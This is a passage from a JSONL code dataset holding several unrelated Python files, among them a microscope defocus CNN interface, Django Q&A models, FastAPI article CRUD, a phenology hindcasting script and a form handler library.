str(self.ACTION_STRINGS['general'])) or self.ACTION_STRINGS[kind]\n self.is_true = self.check.key_word_check(self.action, \"action\")\n\n def q_new_term(self):\n \"\"\"Ask for a new term. Accepts no arguments\"\"\"\n self.new = input(self.POLITE_STRING + self.NEW_TERM_STRINGS['general']) or \"n\"\n self.is_true = self.check.key_word_check(self.new, \"y_or_n\")\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.new\n else:\n self.new = input(str(self.new) + self.INVALID_STRING + str(self.NEW_TERM_STRINGS['invalid'])) or \"n\"\n self.is_true = self.check.key_word_check(self.new, \"y_or_n\")\n\n def q_device(self):\n \"\"\"Ask for the type of device. Used to determine the use of Alcatel, Cisco, or Juniper\"\"\"\n self.device = input(self.POLITE_STRING + self.DEVICE_STRINGS['general'])\n self.is_true = self.check.key_word_check(self.device, \"device\")\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.device\n else:\n self.device = input(str(self.device) + self.INVALID_STRING + str(self.DEVICE_STRINGS['invalid']))\n self.is_true = self.check.key_word_check(self.device, \"device\")\n","sub_path":"General_Qs.py","file_name":"General_Qs.py","file_ext":"py","file_size_in_byte":7160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"470699994","text":"import numpy as np\nimport sys\nsys.path.insert(1, '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian_Process/GPTrelated/')\nfrom uscope_calc import sim\nimport matplotlib.pyplot as plt\nimport os\nimport time\n# CNN related libraries\nfrom keras import applications, optimizers, callbacks\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import EarlyStopping\nimport tensorflow as tf\n\nclass machine_interface:\n def __init__(self, dev_ids, start_point = None, CNNpath = '', lens = []):\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" # specify which GPU to use\n self.pvs = np.array(dev_ids)\n self.name = 'Defocus'\n # load the current for the rest lenses, in the order of H1, dH, S6, S7, S3, S4, all are normalzied values\n self.lens = lens\n\n if type(start_point) == type(None):\n current_x = np.zeros(len(self.pvs)) #replace with expression that reads current ctrl pv values (x) from machine\n self.setX(current_x)\n else: \n self.setX(start_point)\n # replace with CNN path later\n self.DefocusModel = self.loadCNN('CNNmodels/VGG16_defocus_test14.h5')\n\n def loadCNN(self, path):\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n model = applications.VGG16(weights=None, include_top=False, input_shape=(128, 128, 3))\n print('Model loaded')\n top_model = Sequential()\n top_model.add(Flatten(input_shape=model.output_shape[1:]))\n top_model.add(Dense(256, activation='relu'))\n top_model.add(Dropout(0.0))\n top_model.add(Dense(1,activation=None))\n new_model = Sequential()\n\n for l in model.layers:\n new_model.add(l)\n\n new_model.add(top_model)\n new_model.load_weights(path)\n return new_model\n\n def scale_range(self, input, min, max):\n input += -(np.min(input))\n input /= np.max(input) / (max - min)\n input += min\n return input\n\n def aperture_generator(self, px_size, simdim, ap_size):\n x = np.linspace(-simdim, simdim, px_size)\n y = np.linspace(-simdim, simdim, px_size)\n xv, yv = np.meshgrid(x, y)\n apt_mask = mask = np.sqrt(xv*xv + yv*yv) < ap_size # aperture mask\n return apt_mask\n\n def setLens(self, lens_new):\n self.lens = np.array(lens_new, ndmin=1)\n\n def setX(self, x_new):\n self.x = np.array(x_new, ndmin=1)\n # add expressions to set machine ctrl pvs to the position called self.x -- Note: self.x is a 2-dimensional array of shape (1, ndim). To get the values as a 1d-array, use self.x[0]\n\n def getDefocus(self):\n ASCIIFILE = '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian_Process/outscope.txt'\n PNGFILE = '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian-Process/ronchigram.npy'\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n MConHBAR = 2.59e12\n maxsig = 1 # determine how many standard deviations are we going to plot\n\n x_list = []\n # normalize then divided by 2 to match the contrast of Matlab simulated Ronchigrams\n # frame = self.scale_range(shadow, 0, 1) / 2 * self.aperture_generator(128, 40, 40)\n frame = np.load(PNGFILE)\n frame = self.scale_range(frame, 0, 1)\n new_channel = np.zeros(frame.shape)\n img_stack = np.dstack((frame, new_channel, new_channel))\n x_list.append(img_stack)\n x_list = np.concatenate([arr[np.newaxis] for arr in x_list])\n prediction = self.DefocusModel.predict(x_list, batch_size = 1)\n # print(prediction)\n defocus = 1 - prediction[0][0]\n print('Estimating defocus...')\n del x_list, img_stack, frame, prediction\n return defocus\n\n\n def getState(self): \n ASCIIFILE = '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian-Process/outscope.txt'\n PNGFILE = '/home/chenyu/Desktop/Bayesian-optimization-using-Gaussian-Process/ronchigram.npy'\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n MConHBAR = 2.59e12\n maxsig = 1 # determine how many standard deviations are we going to plot\n\n # Same high and low range, the 4th element for defocus is not used.\n x_low = np.asarray([1000, -40, 387000, -685000, -3.7515e6, 119000, 640000])\n x_high = np.asarray([2800, 40, 393000, -622500, -3.7495e6, 120300, 651000])\n\n xlim, ylim, shadow = sim(\n alpha = 1.0e-4*5,\n S1 = 2.5e5,\n S2 = 2.44e5 + self.x[0][0] * 0.06e5,\n H1 = self.lens[0][0] * (x_high[0] - x_low[0]) + x_low[0],\n H2 = self.lens[0][0] * (x_high[0] - x_low[0]) + x_low[0] + self.lens[0][1] * (x_high[1] - x_low[1]) + x_low[1],\n S3 = self.lens[0][4]* (x_high[5] - x_low[5]) + x_low[5], #119931.5,\n S4 = self.lens[0][5]* (x_high[6] - x_low[6]) + x_low[6], #648691.415,\n S6 = self.lens[0][2]* (x_high[2] - x_low[2]) + x_low[2], #390000,\n S7 = self.lens[0][3]* (x_high[3] - x_low[3]) + x_low[3], #-654100.0\n Obj = -3.7505e6,\n\n # Option 2: control S7 to change defocus\n # alpha = 1.0e-4*5,\n # S1 = 2.5e5,\n # S2 = 2.5e5,\n # H1 = self.lens[0][0] * (x_high[0] - x_low[0]) + x_low[0],\n # H2 = self.lens[0][0] * (x_high[0] - x_low[0]) + x_low[0] + self.lens[0][1] * (x_high[1] - x_low[1]) + x_low[1],\n # S3 = self.lens[0][4]* (x_high[5] - x_low[5]) + x_low[5], #119931.5,\n # S4 = self.lens[0][5]* (x_high[6] - x_low[6]) + x_low[6], #648691.415,\n # S6 = self.lens[0][2]* (x_high[2] - x_low[2]) + x_low[2], #390000,\n # S7 = self.x[0][0]* (x_high[3] - x_low[3]) + x_low[3], #-654100.0\n # Obj = -3.7505e6,\n\n ) # the parameters that are not given an value here would be set to the default values, which could be found in uscope.py\n # the sim function would return the Ronchigram, and save the outscope.txt file to the path that was calling this function\n # i.e. the path of the Jupyte Notebook\n\n\n # Get defocus from CNN model using the shadow returned by GPT\n x_list = []\n # normalize then divided by 2 to match the contrast of Matlab simulated Ronchigrams\n # frame = self.scale_range(shadow, 0, 1) / 2 * self.aperture_generator(128, 40, 40)\n frame = self.scale_range(shadow, 0, 1)\n new_channel = np.zeros(frame.shape)\n img_stack = np.dstack((frame, new_channel, new_channel))\n x_list.append(img_stack)\n x_list = np.concatenate([arr[np.newaxis] for arr in x_list])\n prediction = self.DefocusModel.predict(x_list, batch_size = 1)\n # print(prediction)\n objective_state = 1 - prediction[0][0]\n print('Predicting defocus...')\n del x_list, img_stack, frame, prediction\n\n # The rest is the same for two different emittance calculation methods\n print('saving ronchigram...')\n np.save('ronchigram.npy', shadow)\n\n return np.array(self.x, ndmin = 2), np.array([[objective_state]])\n \n \n","sub_path":"machine_interfaces/machine_interface_Defocus.py","file_name":"machine_interface_Defocus.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345715174","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/formprocess/handler.py\n# Compiled at: 2012-02-09 02:39:36\n\"\"\" Generic web form handler class and associates. \"\"\"\nimport logging\nfrom formencode import Invalid\nfrom formencode.variabledecode import variable_decode, variable_encode\nfrom webob.multidict import MultiDict\nfrom webhelpers.containers import DumbObject\nlog = logging.getLogger(__name__)\n\nclass FormHandler(object):\n \"\"\" Base form handler. \"\"\"\n use_variable_encode = False\n use_variable_decode = False\n schema = None\n\n def __init__(self, schema=None, use_variable_encode=None, use_variable_decode=None, update_defaults_hooks=None, get_schema_hook=None, update_state_hooks=None, on_process_error_hooks=None, defaults_filter_hooks=None, customize_fill_kwargs_hooks=None):\n \"\"\"\n :param schema: This is used if there is no get_schema hook.\n :param use_variable_encode: Encode the defaults and errors using\n formencode's variable_encode.\n :param use_variable_decode: Decode the defaults using\n formencode's variable_decode.\n :param update_defaults_hooks: Add more defaults to the initial\n defaults.\n :param update_state_hooks: Called to add in more attributes onto\n the state.\n :param on_process_error_hooks: Called when an error occurs while\n processing the form submission.\n :param defaults_filter_hooks: Call to pre-filter the defaults\n before they are processed regardless of error or success.\n :param customize_fill_kwargs_hooks: This function is called during\n build_form_dict so that the developer can customize the\n fill_kwargs.\n :param get_schema_hook: This function is called to get the schema\n for processing the defaults. There can *only* be one.\n \"\"\"\n if schema is not None:\n self.schema = schema\n if use_variable_encode is not None:\n self.use_variable_encode = use_variable_encode\n if use_variable_decode is not None:\n self.use_variable_decode = use_variable_decode\n self.hooks = {'update_defaults': [], 'update_state': [], 'on_process_error': [], 'defaults_filter': [], 'customize_fill_kwargs': [], 'get_schema': None}\n if update_defaults_hooks:\n self.hooks['update_defaults'].extend(update_defaults_hooks)\n if update_state_hooks:\n self.hooks['update_state'].extend(update_state_hooks)\n if on_process_error_hooks:\n self.hooks['on_process_error'].extend(on_process_error_hooks)\n if defaults_filter_hooks:\n self.hooks['defaults_filter'].extend(defaults_filter_hooks)\n if customize_fill_kwargs_hooks:\n self.hooks['customize_fill_kwargs'].extend(customize_fill_kwargs_hooks)\n if get_schema_hook:\n self.hooks['get_schema'] = get_schema_hook\n return\n\n def have_defaults(self, form_dict):\n \"\"\" Use this to determine if the defaults have been fetched yet. \"\"\"\n return 'defaults' in form_dict and form_dict['defaults'] is not None\n\n def was_success(self, form_dict):\n \"\"\" Use this when end_process returns the form_dict. \"\"\"\n return not bool(form_dict['errors'])\n\n def get_schema(self, unsafe_params, state):\n \"\"\"\n This method allows the developer to choose a schema at request time\n based on the submission.\n \"\"\"\n if self.hooks['get_schema']:\n schema = self.hooks['get_schema'](self, unsafe_params, state)\n else:\n assert self.schema\n schema = self.schema\n return schema\n\n def _make_state(self, defaults, state_attrs):\n \"\"\" Makes a state object and returns it. \"\"\"\n state = DumbObject(**state_attrs)\n for update_state in self.hooks['update_state']:\n update_state(self, defaults, state)\n\n return state\n\n def _prompt_defaults(self, state):\n \"\"\" Only called when no defaults are given to prompt(). \"\"\"\n return MultiDict()\n\n def prompt(self, defaults=None, **state_attrs):\n \"\"\" Send the form to the user for the first time. \"\"\"\n state = self._make_state(defaults, state_attrs)\n if defaults is None:\n defaults = self._prompt_defaults(state)\n for update_defaults in self.hooks['update_defaults']:\n defaults = update_defaults(self, defaults, state)\n\n if self.use_variable_encode and defaults:\n defaults = variable_encode(defaults)\n return self.build_form_dict(defaults=defaults, state=state)\n\n def process(self, unsafe_params, **state_attrs):\n \"\"\" Processes a form submission. \"\"\"\n state = self._make_state(unsafe_params, state_attrs)\n for defaults_filter in self.hooks['defaults_filter']:\n unsafe_params = defaults_filter(self, unsafe_params, state)\n\n if self.use_variable_decode:\n unsafe_params = variable_decode(unsafe_params)\n schema = self.get_schema(unsafe_params, state)\n try:\n defaults = schema.to_python(unsafe_params, state=state)\n except Invalid as e:\n return self._process_invalid(e, state=state)\n\n form_dict = dict(defaults=defaults, errors=None, state=state)\n if not self.was_success(form_dict):\n return form_dict\n else:\n defaults, state = form_dict['defaults'], form_dict['state']\n try:\n return self.end_process(defaults, state)\n except Invalid as e:\n return self._process_invalid(e, state=state)\n\n return\n\n def _process_invalid(self, e, state=None):\n \"\"\" Process an Invalid exception. \"\"\"\n errors = e.unpack_errors(encode_variables=self.use_variable_encode)\n if self.use_variable_encode:\n defaults = variable_encode(e.value)\n else:\n defaults = e.value\n for on_process_error in self.hooks['on_process_error']:\n defaults, errors = on_process_error(self, defaults, errors, state)\n\n return self.build_form_dict(defaults=defaults, errors=errors, state=state)\n\n def build_form_dict(self, defaults=None, errors=None, state=None):\n \"\"\" Build fill_kwargs with customizations and return render vars. \"\"\"\n fill_kwargs = {}\n fill_kwargs['defaults'] = defaults\n fill_kwargs['errors'] = errors\n for customize_fill_kwargs in self.hooks['customize_fill_kwargs']:\n fill_kwargs = customize_fill_kwargs(self, defaults, errors, state, fill_kwargs)\n\n return self.end_build_form_dict(defaults, errors, state, fill_kwargs)\n\n def end_build_form_dict(self, defaults, errors, state, fill_kwargs):\n \"\"\" Assemble the variables to be returned by prompt and process. \"\"\"\n form_dict = {'defaults': defaults, \n 'errors': errors, \n 'state': state, \n 'fill_kwargs': fill_kwargs}\n return form_dict\n\n def end_process(self, defaults, state):\n \"\"\" Leave this as-is if you want to handler success/error inside\n caller of process(). \"\"\"\n return self.build_form_dict(defaults=defaults, errors={}, state=state)","sub_path":"pycfiles/formprocess-0.4.3-py2.7/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":7470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351014710","text":"from notification.models import Notification\nfrom django.contrib.contenttypes.fields import GenericRelation\nfrom django.db import models\nfrom django.conf import settings\nfrom django.db.models.expressions import Value\nfrom django.utils import timezone\nfrom account.models import Account\nfrom django.contrib import admin\nfrom django.db.models.signals import post_save, post_delete\n# Create your models here.\n\n\nclass Question(models.Model):\n title = models.CharField(max_length=30)\n question = models.CharField(max_length=300)\n auth = models.ForeignKey(\n Account, on_delete=models.CASCADE, related_name='owner', blank=True)\n like = models.ManyToManyField(\n Account, related_name=\"question_like\", default=0, blank=True)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return str(self.title)\n\n\nclass Answer(models.Model):\n answer = models.CharField(max_length=300)\n question = models.ForeignKey(\n Question, on_delete=models.CASCADE, related_name=\"question_answer\", blank=True)\n auth = models.ForeignKey(\n Account, on_delete=models.CASCADE, related_name=\"auth_answer\", blank=True)\n like = models.ManyToManyField(\n Account, related_name=\"answer_like\", default=None, blank=True)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def user_add_answer(sender, instance, *args, **kwargs):\n ans = instance\n answer = ans.answer\n question = ans.question\n sender = ans.auth\n\n notify = Notification(answer=ans, question=question, sender=sender, receiver=ans.question.auth, notification_type=3)\n notify.save()\n\n def user_remove_answer(sender, instance, *args, **kwargs):\n ans = instance\n answer = ans.answer\n question = ans.question\n sender = ans.auth\n\n notify = Notification.objects.filter(answer=ans, question=question, sender=sender, notification_type=3)\n notify.delete()\n\n def __str__(self):\n return str(self.answer)\n\n def number_of_likes(self):\n return self.like.all().count()\n\n\nLIKE_CHOICES = (\n ('like', 'like'),\n ('unlike', 'unlike'),\n)\n\n\nclass LikeQuestion(models.Model):\n auth = models.ForeignKey(\n Account, related_name=\"question_auth\", on_delete=models.CASCADE)\n question = models.ForeignKey(\n Question, related_name=\"ques\", on_delete=models.CASCADE)\n value = models.CharField(choices=LIKE_CHOICES,\n default='Like', max_length=10)\n\n def user_like_question(sender, instance, *args, **kwargs):\n like = instance\n question = like.question\n sender = like.auth\n\n notify = Notification(question=question, sender=sender,\n receiver=question.auth, notification_type=2)\n notify.save()\n\n def user_unlike_question(sender, instance, *args, **kwargs):\n like = instance\n question = like.question\n sender = like.auth\n\n notify = Notification.objects.filter(\n question=question, sender=sender, notification_type=2)\n notify.delete()\n\n def __str__(self):\n return str(self.POST)\n\n def __str__(self):\n return str(self.ans)\n\n\nclass Like(models.Model):\n auth = models.ForeignKey(\n Account, related_name=\"auth_like\", on_delete=models.CASCADE)\n ans = models.ForeignKey(\n Answer, related_name=\"ans_like\", on_delete=models.CASCADE)\n value = models.CharField(choices=LIKE_CHOICES,\n default='Like', max_length=10)\n\n def user_like_answer(sender, instance, *args, **kwargs):\n like = instance\n ans = like.ans\n sender = like.auth\n\n notify = Notification(answer=ans, sender=sender,\n receiver=ans.auth, notification_type=1)\n notify.save()\n\n def user_unlike_answer(sender, instance, *args, **kwargs):\n like = instance\n ans = like.ans\n sender = like.auth\n\n notify = Notification.objects.filter(\n answer=ans, sender=sender, notification_type=1)\n notify.delete()\n\n def __str__(self):\n return str(self.POST)\n\n\npost_save.connect(Like.user_like_answer, sender=Like)\npost_delete.connect(Like.user_unlike_answer, sender=Like)\n\npost_save.connect(LikeQuestion.user_like_question, sender=LikeQuestion)\npost_delete.connect(LikeQuestion.user_unlike_question, sender=LikeQuestion)\n\n\npost_save.connect(Answer.user_add_answer, sender=Answer)\npost_delete.connect(Answer.user_remove_answer, sender=Answer)\n","sub_path":"question/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528119600","text":"from fastapi import status, HTTPException\nfrom database.models import DbArticle\nfrom schemas import ArticleBase\nfrom sqlalchemy.orm.session import Session\n\n\n\ndef create_article(db: Session, request: ArticleBase):\n article = DbArticle(\n title = request.title,\n content = request.content,\n published = request.published,\n user_id = request.creator_id\n )\n db.add(article)\n db.commit()\n db.refresh(article)\n return article\n\n\ndef get_article(db: Session, id: int):\n article = db.query(DbArticle).filter(DbArticle.id == id).first()\n if not article:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Article with id {id} does not exist.\")\n return article\n\n\ndef get_articles(db: Session):\n return db.query(DbArticle).all()\n\n\ndef update_article_by_id(db: Session, id: int, request: ArticleBase):\n article = db.query(DbArticle).filter(DbArticle.id == id)\n article.update({\n DbArticle.title: request.title,\n DbArticle.content: request.content,\n DbArticle.published: request.published,\n DbArticle.user_id : request.user_id\n })\n db.commit()\n if not article:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Article with id {id} does not exist.\")\n return article\n","sub_path":"practice/database/db_article.py","file_name":"db_article.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130999760","text":"from django.urls import path, include\nfrom . import views\nfrom rest_framework import routers\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n\nrouter = routers.DefaultRouter()\nrouter.register(r'traffic', views.TrafficViewSet)\nrouter.register(r'road', views.RoadViewSet)\nrouter.register(r'light', views.LightViewSet)\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('camera/', views.camera, name='camera'),\n path('profile/', views.profile, name='profile'),\n path('api/', include(router.urls)),\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/refresh/', TokenRefreshView, name='token_refresh')\n]\n","sub_path":"traffic/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"446000358","text":"from typing import Dict, Tuple, List\n\nfrom nico.matrix import Matrix, parse_str\n\n\ndef parser(filename: str) -> Matrix:\n res = Matrix()\n with open(filename) as fp:\n lines = fp.readlines()\n\n constraint = res.col_constraints\n for line in lines:\n if line.startswith('#'):\n constraint = res.line_constraints\n continue\n constraint.append(parse_str(line))\n\n res.init()\n return res\n","sub_path":"nico/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5030519","text":"from django.shortcuts import render\nfrom .models import LoadBook\nfrom common.models import BookList\n\n# Create your views here.\n\ndef SearchBarcode(request):\n check = LoadBook.objects.all()\n\n barcode = request.GET.get('search')\n if barcode:\n search_book = BookList.objects.get(barcode=barcode)\n LoadBook.objects.create(title=search_book.title, barcode=barcode, location=search_book.location)\n\n data = LoadBook.objects.all()\n return render(request, 'worker/search_screen.html', {'data': data})\n\ndef drawmap(request):\n data = LoadBook.objects.all()\n #책 위치값을 한꺼번에 시리얼통신으로 전송하는 코드 작성 필요\n\n #drawmap에 표시할 제목: 000외 몇 권을 표시하기 위한 코드\n count = len(LoadBook.objects.all())\n\n searched_book = data[0].title + '외' + str(count-1) + '권'\n\n return render(request, 'common/draw_map.html', {'searched_book': searched_book, 'type': 'worker'})\n\n\n # common에 있는 지도 그리는 template으로 보내는 형태, 근로자가 보내므로 type은 worker인 dictionary 데이터 보냄.\n # 적절하게 searched_book 데이터 바꿀 것.\n","sub_path":"worker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413171144","text":"import pandas as pd\nimport numpy as np\nimport xarray as xr\nimport glob\nimport datetime\nfrom time import sleep\nimport time\nfrom tools import tools\nfrom pyPhenology import utils\n\nimport hindcast_config\nconfig = tools.load_config()\n\n\n######\n# Species & phenology modeling stuff\nhindcast_species = pd.read_csv(config['data_folder']+'species_for_hindcasting.csv')\nphenology_model_metadata = pd.read_csv(config['phenology_model_metadata_file'])\nforecast_metadata = hindcast_species.merge(phenology_model_metadata, \n left_on =['species','Phenophase_ID','current_forecast_version'],\n right_on=['species','Phenophase_ID','forecast_version'], \n how='left')\n\n#################\n# info on where and what to do hindcasts with. \nsite_info = pd.read_csv(config['data_folder']+hindcast_config.observation_site_info_file)\nsite_info.rename(index=str, columns={'Site_ID':'site_id','Latitude':'lat','Longitude':'lon'}, inplace=True)\nsite_info = site_info[['site_id','lat','lon']]\n\n# not all sites have all species, so load the observation data to pair down\n# the predictions needed. \nspecies_sites = pd.read_csv(config['data_folder']+hindcast_config.observation_file)\n\n#site_info = site_info.head(100)\n#######\n# Other stuff\n\n#doy_0 = np.datetime64(hindcast_config.doy_0)\n\ntoday = datetime.datetime.today().date()\n\n# For spatial reference\nland_mask = xr.open_dataset(config['mask_file'])\n\n####################\n# Climate files\n# 20 years of daily temperature\nhistoric_temp_filenames = glob.glob(config['historic_observations_folder']+'yearly/prism_tmean*') \nhistoric_temperature = xr.open_mfdataset(historic_temp_filenames)\nhistoric_years = np.unique([t.year for t in historic_temperature.time.to_series()])\n\n# don't use the first year cause data from the prior year is needed\nhistoric_years = historic_years[1:]\n\n# Align the latitude and longitude as they can become mismatched due \n# to rounding errors\n#historic_temperature['lat'] = current_season_temperature['lat']\n#historic_temperature['lon'] = current_season_temperature['lon']\n\n######################################################\n#from joblib import parallel_backend\n#from dask import delayed, compute\n#from dask.distributed import Client, LocalCluster\nfrom joblib import Parallel, delayed\n\n#cluster = LocalCluster(n_workers=hindcast_config.n_prediction_jobs)\n#client = Client(cluster)\n\n######################################################\ndef dataframe_chunker(seq, size):\n return (seq[pos:pos + size] for pos in range(0, len(seq), size))\n\n@delayed\ndef process_species(model, site_info, site_temp, historic_climate_member, species, Phenophase_ID):\n try:\n prediction_array = model.predict(to_predict=site_info,\n predictors=site_temp,\n aggregation='none',\n n_jobs=-1)\n \n \n pheno_ensemble_names = [m['parameters'][0]['model_name'] for m in model._get_model_info()['core_models']]\n num_bootstraps = len(model.model_list[0].model_list)\n \n # prediction_array is a 3D 'phenology_esemble' x 'bootstrap' x 'site' array,\n # use xarray to easily label it and convert to dataframe\n prediction_dataframe = xr.DataArray(prediction_array, dims=('phenology_model','bootstrap','site_id'),\n name='doy_prediction',\n coords={'phenology_model':pheno_ensemble_names,\n 'bootstrap': range(num_bootstraps),\n 'site_id': site_info.site_id}).to_dataframe().reset_index()\n \n prediction_dataframe['species'] = species\n prediction_dataframe['Phenophase_ID'] = Phenophase_ID\n prediction_dataframe['issue_date'] = '2000-01-01' # climatology method does not use issue dates, so use an absurd one to make sure I catch it later on.\n prediction_dataframe['climate_member'] = historic_climate_member\n \n return prediction_dataframe\n except:\n return pd.DataFrame()\n\ndef extract_single_site_temp(clim, site):\n site_climate_chunk = clim.sel(lat = site.lat.values, \n lon = site.lon.values, \n method='nearest')\n site['climate_lon'] = site_climate_chunk.lon\n site['climate_lat'] = site_climate_chunk.lat\n \n site_climate_chunk = site_climate_chunk.to_dataframe().dropna().reset_index()\n \n site_climate_chunk.rename(index=str, columns={'lat':'climate_lat','lon':'climate_lon'}, inplace=True) \n \n site_temp_chunk = site.merge(site_climate_chunk, how='left',\n on=['climate_lon','climate_lat'])\n\n return site_temp_chunk\n\n# drop leap days from an xr dataset because, just, no.....\ndef pd_drop_leap_days(timeseries):\n leap_days = np.logical_and(timeseries.month == 2, timeseries.day == 29)\n not_leap_days = np.logical_not(leap_days)\n return timeseries[not_leap_days]\n\n######################################################\n# for tracking progress\ntotal_species=len(forecast_metadata)\nstart_time = time.time()\n\n######################################################\n# final results\nall_hindcast_predictions = []\n\nfor historic_year_i, historic_year in enumerate(historic_years):\n time_elapsed = np.round((time.time() - start_time)/60,0)\n print('Historic year {y}/20, elapsed time {t} minutes'.format(y = historic_year_i,\n t = time_elapsed))\n \n \n historic_year_start_date = '{y}-11-01'.format(y = historic_year-1)\n historic_year_end_date = '{y}-08-01'.format(y = historic_year)\n doy_0 = np.datetime64('{y}-01-01'.format(y = historic_year))\n \n \n historic_dates_to_extract = pd.date_range(historic_year_start_date,\n historic_year_end_date,\n freq='1D')\n \n historic_dates_to_extract = pd_drop_leap_days(historic_dates_to_extract)\n \n # crop the historic climate to the current issue date forward\n historic_temperature_subset = historic_temperature.sel(time = historic_dates_to_extract).copy()\n historic_temperature_subset.load()\n \n # convert dates from the 90's and 2000's to dates for the 2018 season\n #historic_months = pd.DatetimeIndex(historic_temperature_subset.time.values).month\n #historic_days = pd.DatetimeIndex(historic_temperature_subset.time.values).day\n #adjusted_days = []\n #for d, m in zip(historic_days, historic_months):\n # y = 2017 if m >=10 else 2018\n # adjusted_days.append('{y}-{m}-{d}'.format(y=y, m=m, d=d))\n \n #historic_temperature_subset['time'] = pd.DatetimeIndex(adjusted_days)\n \n # combine w/ 2018 temps up to the current issue date\n #historic_climate_member = current_season_temperature_subset.combine_first(historic_temperature_subset)\n #historic_climate_member = xr.merge([current_season_temperature_subset, historic_temperature_subset])\n #historic_climate_member.load()\n #print('year {y}, issue_date {i}, {n} days combined in historic member'.format(y=historic_year,\n # i=hindcast_issue_date,\n # n=historic_climate_member.dims['time']))\n \n \n ####################################################\n # Get timeseries of daily temp for each site needed for hindcasting\n # I want the temperature at all sites listed in site_info. This does a nearest neighbor lookup,\n # but to associate each time series with a site_id I need to use the lat/lon from the \n # climate file, which are slighly different than the points in site_info\n site_info_for_prediction = site_info.copy()\n\n site_temp = pd.DataFrame()\n \n site_temp = Parallel(n_jobs=8)(delayed(extract_single_site_temp)(clim=historic_temperature_subset, site=s.copy()) for s in dataframe_chunker(site_info_for_prediction,1))\n site_temp = pd.concat(site_temp)\n \n site_temp['doy'] = pd.TimedeltaIndex(site_temp.time.values - doy_0).days.values\n site_temp = site_temp[['site_id','tmean','doy']]\n site_temp.rename(index=str, columns={'tmean':'temperature'},inplace=True)\n \n # some sites dont have data from being over water or in canada\n sites_without_temp = site_temp.site_id[site_temp.temperature.isna()]\n \n site_info_for_prediction = site_info_for_prediction[~site_info_for_prediction.site_id.isin(sites_without_temp)]\n \n \n # insert dummy year columns needed by predict()\n site_info_for_prediction['year'] = hindcast_config.target_season\n site_temp['year'] = hindcast_config.target_season\n \n ####################################################\n # Apply each model to the climate data\n hindcasts_to_compute = []\n for species_i, forecast_info in enumerate(forecast_metadata.to_dict('records')):\n \n species = forecast_info['species']\n Phenophase_ID = forecast_info['Phenophase_ID']\n model_file = config['phenology_model_folder']+forecast_info['model_file']\n model = utils.load_saved_model(model_file)\n\n # only make predictions where this species is located. \n sites_for_this_species = species_sites.query('species == @species & Phenophase_ID == @Phenophase_ID')\n site_info_for_this_species = site_info_for_prediction[site_info_for_prediction.site_id.isin(sites_for_this_species.site_id)]\n site_temp_for_this_species = site_temp[site_temp.site_id.isin(sites_for_this_species.site_id)]\n #print('{s} - {p}'.format(s=species, p=Phenophase_ID))\n #print('################## site info ###################')\n #print(site_info_for_this_species)\n #print('################## site temp ###################')\n #print(site_temp_for_this_species)\n hindcasts_to_compute.append(process_species(model=model,\n site_info = site_info_for_this_species,\n site_temp = site_temp_for_this_species,\n historic_climate_member = historic_year_i+1,\n species = species,\n Phenophase_ID = Phenophase_ID))\n \n all_hindcast_predictions.extend(Parallel(n_jobs=hindcast_config.n_prediction_jobs)(hindcasts_to_compute))\n\nall_hindcast_predictions = pd.concat(all_hindcast_predictions)\n\nall_hindcast_predictions.to_csv(config['data_folder']+ 'evaluation/hindcast_climatology_method_data_2018.csv', index=False)\n","sub_path":"hindcasting/hindcasting_site_level_climatology_method.py","file_name":"hindcasting_site_level_climatology_method.py","file_ext":"py","file_size_in_byte":11146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540313619","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nclass Dog:\r\n kind = 'canine'\r\n\r\n def __init__(self, name):\r\n self.name = name\r\n self.tricks = []\r\n\r\n def add_trick(self, trick):\r\n self.tricks.append(trick)\r\n\r\nif __name__ == '__main__':\r\n d = Dog(\"Fido\")\r\n e = 